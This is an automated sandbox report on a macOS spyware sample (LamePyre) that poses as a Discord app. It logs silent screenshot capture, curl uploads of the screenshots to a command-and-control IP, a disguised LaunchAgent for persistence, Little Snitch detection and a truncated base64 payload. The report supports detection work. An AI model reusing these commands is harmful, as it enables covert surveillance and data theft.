Analysis Report Pe7niErK6B

Overview

General Information

Joe Sandbox Version: 25.0.0
Analysis ID: 65585
Start date: 12.12.2018
Start time: 11:23:26
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 11m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Pe7niErK6B (renamed file extension from none to app)
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal76.troj.spyw.evad.macAPP@0/34@0/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many READ_NOCANCEL calls found.

Detection

Strategy    Score   Range     Reporting        Whitelisted   Detection
Threshold   76      0 - 100   Report FP / FN   false         malicious

Classification

Mitre Att&ck Matrix

The matrix is listed here by tactic (one column each); a number in parentheses is the signature hit count the report attaches to the technique as a superscript, and entries without a count are matrix placeholder cells that no signature matched.

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise
Execution: Command-Line Interface (1); Scripting (31); Windows Management Instrumentation
Persistence: Hidden Files and Directories (1); Launch Daemon (2); Launch Agent (4)
Privilege Escalation: Launch Daemon (2); Accessibility Features; Path Interception
Defense Evasion: Masquerading (1); Hidden Files and Directories (1); Scripting (31)
Credential Access: Credential Dumping; Network Sniffing; Input Capture
Discovery: Process Discovery (11); Security Software Discovery (1); System Information Discovery (31)
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management
Collection: Screen Capture (2); Data from Removable Media; Data from Network Shared Drive
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration
Command and Control: Uncommonly Used Port (1); Standard Application Layer Protocol (11); Custom Cryptographic Protocol

Signature Overview

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.0.50:49243 -> 37.1.221.204:8080
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.221.204 (32 consecutive identical entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 17.253.57.212 (2 consecutive identical entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 37.1.221.204 (16 further consecutive identical entries)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Detected macOS LamePyre spyware
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) | IOC file dropped: /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Captures screenshots with shell command 'screencapture'
Source: /bin/bash (PID: 584) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 587) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 594) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 599) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 605) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 612) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 614) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 621) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 628) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 630) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 637) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 639) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 646) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 649) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 655) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 662) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 664) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 671) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 678) | Screen captured: screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Explicitly creates screenshots silently (i.e. without playing sounds)
Source: /bin/bash (PID: 584) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 587) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 594) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 599) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 605) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 612) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 614) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 621) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 628) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 630) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 637) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 639) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 646) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 649) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 655) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 662) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 664) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 671) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png
Source: /bin/bash (PID: 678) | Screencapture executable (-x switch): screencapture -C -x /tmp/alloy.png -> screencapture -C -x /tmp/alloy.png

System Summary:

Writes Python scripts without typical Python file extensions
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) | Python file created: /Users/henry/.system/.systemkeeper
Classification label
Source: classification engine | Classification label: mal76.troj.spyw.evad.macAPP@0/34@0/0

Persistence and Installation Behavior:

Many shell processes execute programs via execve syscall (may be indicative of malicious behavior)
Source: /bin/sh (PID: 572) | Shell process: mkdir -p /Users/henry/.system
Source: /bin/sh (PID: 573) | Shell process: mkdir -p /Users/henry/Library/LaunchAgents
Source: /bin/sh (PID: 574) | Shell process: launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Source: /bin/sh (PID: 578) | Shell process: ps -ef
Source: /bin/sh (PID: 580) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 581) | Shell process: grep -v grep
Source: /bin/sh (PID: 579) | Shell process: ps -ef
Source: /bin/sh (PID: 582) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 583) | Shell process: grep -v grep
Source: /bin/sh (PID: 591) | Shell process: ps -ef
Source: /bin/sh (PID: 592) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 593) | Shell process: grep -v grep
Source: /bin/sh (PID: 601) | Shell process: ps -ef
Source: /bin/sh (PID: 602) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 603) | Shell process: grep -v grep
Source: /bin/sh (PID: 609) | Shell process: ps -ef
Source: /bin/sh (PID: 610) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 611) | Shell process: grep -v grep
Source: /bin/sh (PID: 618) | Shell process: ps -ef
Source: /bin/sh (PID: 619) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 620) | Shell process: grep -v grep
Source: /bin/sh (PID: 625) | Shell process: ps -ef
Source: /bin/sh (PID: 626) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 627) | Shell process: grep -v grep
Source: /bin/sh (PID: 634) | Shell process: ps -ef
Source: /bin/sh (PID: 635) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 636) | Shell process: grep -v grep
Source: /bin/sh (PID: 643) | Shell process: ps -ef
Source: /bin/sh (PID: 644) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 645) | Shell process: grep -v grep
Source: /bin/sh (PID: 651) | Shell process: ps -ef
Source: /bin/sh (PID: 652) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 653) | Shell process: grep -v grep
Source: /bin/sh (PID: 659) | Shell process: ps -ef
Source: /bin/sh (PID: 660) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 661) | Shell process: grep -v grep
Source: /bin/sh (PID: 668) | Shell process: ps -ef
Source: /bin/sh (PID: 669) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 670) | Shell process: grep -v grep
Source: /bin/sh (PID: 675) | Shell process: ps -ef
Source: /bin/sh (PID: 676) | Shell process: grep Little Snitch
Source: /bin/sh (PID: 677) | Shell process: grep -v grep
Uploads files by using the "curl" command and emulating a filled-in form
Source: /bin/bash (PID: 586) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 588) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 595) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 604) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 606) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 613) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 615) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 622) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 629) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 631) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 638) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 640) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 647) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 654) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 656) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 663) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 665) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 672) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 679) | Curl file upload using -F: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Creates hidden files, links and/or directories
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) | Hidden file created: /Users/henry/.system/.helper
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 566) | Hidden file created: /Users/henry/.system/.systemkeeper
Source: /usr/sbin/screencapture (PID: 584) | Hidden file created: /tmp/.alloy.png-bSGC
Source: /usr/sbin/screencapture (PID: 587) | Hidden file created: /tmp/.alloy.png-fVAs
Source: /usr/sbin/screencapture (PID: 594) | Hidden file created: /tmp/.alloy.png-trDy
Source: /usr/sbin/screencapture (PID: 599) | Hidden file created: /tmp/.alloy.png-Ciot
Source: /usr/sbin/screencapture (PID: 605) | Hidden file created: /tmp/.alloy.png-Jwlg
Source: /usr/sbin/screencapture (PID: 612) | Hidden file created: /tmp/.alloy.png-OKVg
Source: /usr/sbin/screencapture (PID: 614) | Hidden file created: /tmp/.alloy.png-0JUk
Source: /usr/sbin/screencapture (PID: 621) | Hidden file created: /tmp/.alloy.png-Scvr
Source: /usr/sbin/screencapture (PID: 628) | Hidden file created: /tmp/.alloy.png-3tBv
Source: /usr/sbin/screencapture (PID: 630) | Hidden file created: /tmp/.alloy.png-9exN
Source: /usr/sbin/screencapture (PID: 637) | Hidden file created: /tmp/.alloy.png-NqNk
Source: /usr/sbin/screencapture (PID: 639) | Hidden file created: /tmp/.alloy.png-MR2Y
Source: /usr/sbin/screencapture (PID: 646) | Hidden file created: /tmp/.alloy.png-8UHL
Source: /usr/sbin/screencapture (PID: 649) | Hidden file created: /tmp/.alloy.png-lIjK
Source: /usr/sbin/screencapture (PID: 655) | Hidden file created: /tmp/.alloy.png-whQ4
Source: /usr/sbin/screencapture (PID: 662) | Hidden file created: /tmp/.alloy.png-WEFK
Source: /usr/sbin/screencapture (PID: 664) | Hidden file created: /tmp/.alloy.png-Idi5
Source: /usr/sbin/screencapture (PID: 671) | Hidden file created: /tmp/.alloy.png-ykTw
Source: /usr/sbin/screencapture (PID: 678) | Hidden file created: /tmp/.alloy.png-17cr
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561) | Shell command executed: /bin/bash -c PAYLOAD_DATA='IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KCmltcG9ydCBiYXNlNjQKaW1wb3J0IGxvZ2dpbmcKaW1wb3J0IG9zCmltcG9ydCBzdWJwcm9jZXNzCmZyb20gc3lzIGltcG9ydCBleGl0CmZyb20gdGV4dHdyYXAgaW1wb3J0IGRlZGVudAoKCkxPQURFUl9PUFRJT05TID0gewogICAgImxhdW5jaF9hZ2VudF9uYW1lIjogImNvbS5hcHBsZS5zeXN0ZW1rZWVwZXIiLAogICAgInBheWxvYWRfZmlsZW5hbWUiOiAiLnN5c3RlbWtlZXBlciIsCiAgICAicHJvZ3JhbV9kaXJlY3RvcnkiOiBvcy5wYXRoLmV4cGFuZHVzZXIoIn4vLnN5c3RlbSIpCn0KUEFZTE9BRF9CQVNFNjQgPSAiSXlFdmRYTnlMMkpwYmk5d2VYUm9iMjRLQ21sdGNHOXlkQ0J6ZVhNc1ltRnpaVFkwTzJWNFpXTW9ZbUZ6WlRZMExtSTJOR1JsWTI5a1pTZ25ZMVpDZFZWVlJtRmtNa3A0VVd4dk9Vb3hRa05pU0VaS1ZtbGpTMkZYTVhkaU0wb3dTVWhPTldONWQyZGtXRXB6WWtkc2FVMXFkSEJpV0VKMlkyNVJaMk50VlhOSlNFNHhXVzVDZVdJeVRteGpNMDAzV1RJeGEwbEVNR2RKYmtKNlNVTXhiRnBwUWpoSlIyUjVXbGhCWjFSSGJEQmtSM2hzV0VOQ1ZHSnRiREJaTW1kblprTkNibU50Vm5kSlF6RXlTVWRrZVZwWVFXbERia0o2U1VRd1oyTXpWbWxqU0VwMldUSldlbU41TlZGaU0wSnNZbWxvYW1KWFVYTkpTRTV2V2xkNGMxQldVbmxrVjFWelNVaE9NRnBIT1RGa1JERjZaRmRLZDJOdE9XcGFXRTU2VEd4Q1NsVkZWWEJEYlRreFpFTkJPVWxJUW5wTWJrNHdXa2M1TVdSRE5YbG
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 572) | Shell command executed: /bin/sh -c mkdir -p /Users/henry/.system
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 573) | Shell command executed: /bin/sh -c mkdir -p /Users/henry/Library/LaunchAgents
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 574) | Shell command executed: /bin/sh -c launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 576) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 577) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 590) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 600) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 608) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 617) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 624) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 633) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 642) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 650) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 658) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 667) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 674) | Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grep
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/bash (PID: 586) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 588) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 595) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 604) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 606) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 613) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 615) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 622) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 629) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 631) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 638) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 640) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 647) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 654) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 656) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 663) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 665) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 672) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Source: /bin/bash (PID: 679) | Curl executable: /usr/bin/curl -> curl -F scr=@/tmp/alloy.png http://37.1.221.204/handler.php?uid=D7FC6553-0FAA-5BB8-86D8-C132DF7DC85C
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 580) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 581) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 582) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 583) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 592) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 593) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 602) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 603) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 610) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 611) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 619) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 620) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 626) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 627) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 635) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 636) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 644) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 645) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 652) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 653) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 660) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 661) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 669) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 670) | Grep executable: /usr/bin/grep -> grep -v grep
Source: /bin/sh (PID: 676) | Grep executable: /usr/bin/grep -> grep Little Snitch
Source: /bin/sh (PID: 677) | Grep executable: /usr/bin/grep -> grep -v grep
Executes the "mkdir" command used to create folders
Source: /bin/sh (PID: 572) | Mkdir executable: /bin/mkdir -> mkdir -p /Users/henry/.system
Source: /bin/sh (PID: 573) | Mkdir executable: /bin/mkdir -> mkdir -p /Users/henry/Library/LaunchAgents
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 578) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 579) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 591) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 601) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 609) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 618) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 625) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 634) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 643) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 651) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 659) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 668) | Ps executable: /bin/ps -> ps -ef
Source: /bin/sh (PID: 675) | Ps executable: /bin/ps -> ps -ef
Executes the "python" command used to interpret Python scripts
Source: /bin/bash (PID: 566) | Python executable: /usr/bin/python -> /usr/bin/python
Explicitly loads/starts launch services
Source: /bin/sh (PID: 574) | Launch agent/daemon loaded: launchctl load -w /Users/henry/Library/LaunchAgents/com.apple.systemkeeper.plist
Reads launchservices plist files
Source: /Users/henry/Desktop/unpack/DiscordApp.app/Contents/MacOS/Application Stub (PID: 561) | Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
